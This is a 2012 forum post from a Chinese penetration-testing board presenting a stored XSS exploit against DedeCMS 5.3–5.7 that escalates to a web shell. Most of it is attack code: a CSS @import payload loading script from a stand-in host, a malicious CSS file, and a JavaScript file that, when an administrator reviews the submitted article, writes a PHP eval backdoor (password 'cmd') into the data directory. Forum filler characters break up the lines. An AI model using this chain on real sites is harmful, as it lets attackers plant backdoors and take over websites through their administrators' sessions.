中国网络渗透测试联盟
标题:
dedecms xss oday通杀所有版本 可getshell
[打印本页]
作者:
admin
时间:
2012-9-15 13:56
标题:
dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
. h5 B/ D, c4 J- Y- @& P2 [4 O, f6 W
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
: O( q. o$ ~, |: R
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
5 q/ S5 b' T0 B/ P
下面说说利用方法。
1 x( y7 W% t! S \! K) g
条件有2个:
/ M/ X. `5 a% @8 K9 M
1.开启注册
9 M7 c+ p. I8 P1 A& M6 I
2.开启投稿
# e+ |; i# X6 t+ d
注册会员----发表文章
: M8 v- ]8 |& W& k& o
内容填写:
5 q( M0 z/ \- k4 r3 b
复制代码
* A8 R) G( O- p* D! B
<style>@im\port'\
http://xxx.com/xss.css';
</style>
# f7 H7 H" m" u+ H4 ]0 e: V
新建XSS.Css
! }: ?1 y! [- p' ^0 D
复制代码
8 T# J; Y5 W* s* P& @ f, R
.body{
. ?4 b2 q, }( D! V7 `
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
8 a4 j: o& x; O0 [' ?
新建xss.js 内容为
! b* v. Z3 W9 I/ V" l. f4 H
复制代码
. a1 S1 t9 a* Y: n! O0 H* J* [
1.var request = false;
& |# U# Q+ G1 v: \+ R% k1 x5 V9 B
2.if(window.XMLHttpRequest) {
6 Q9 o* g6 |1 M5 a0 m, x& K. m' C
3.request = new XMLHttpRequest();
/ ^2 b5 i" d" O6 E! O# d
4.if(request.overrideMimeType) {
* j3 `4 R: X# N4 k9 k
5.request.overrideMimeType('text/xml');
8 i5 G' L; g" Y! r1 a* Z
6.}
4 m5 t6 w5 j+ h* F* L6 y
7.} else if(window.ActiveXObject) {
5 G( {6 f5 Q; N2 c
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
$ x" W c1 _6 h# \" M
9.for(var i=0; i<versions.length; i++) {
0 L* C+ N; P" E" ^4 A) e% q
10.try {
$ y/ Z/ S( H2 G6 g
11.request = new ActiveXObject(versions);
3 |& Q i! B, ^& `
12.} catch(e) {}
# o& Q0 x& T8 H7 b) z
13.}
1 S' k% Z) Y+ i/ q
14.}
2 u3 v* t, w- A3 H
15.xmlhttp=request;
. l% w3 x' k: W& W5 P; x8 o' O9 G
16.function getFolder( url ){
- u: R4 Z6 w- ^* D. ~8 @( X0 G+ Q
17. obj = url.split('/')
s, n% U) [0 `6 t% E, }
18. return obj[obj.length-2]
! `" v a1 X; @- @- ^. B
19.}
v& R/ `6 ]+ z
20.oUrl = top.location.href;
# |' `+ L+ L: E# C, A
21.u = getFolder(oUrl);
6 D- b( [+ i# _( A3 L
22.add_admin();
6 a; D3 l+ I7 q- h% ?/ o! |
23.function add_admin(){
# F' t4 T9 K( j6 e
24.var url= "/"+u+"/sys_sql_query.php";
! T' B+ R$ h( b5 W! [8 V6 s/ d' o _+ X
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
! Q/ o9 s3 ?8 w4 j! O# } d
26.xmlhttp.open("POST", url, true);
@) ?9 _& d6 ~% I# I+ }
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
9 S9 x) ` h- C7 G% D
28.xmlhttp.setRequestHeader("Content-length", params.length);
0 t9 n: S/ U4 d, b# S
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
5 V2 |$ [3 Z2 `# d) f0 {
30.xmlhttp.send(params);
& J$ _' h: J1 K, @* z0 f
31.}
1 j% s! K' h2 A
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2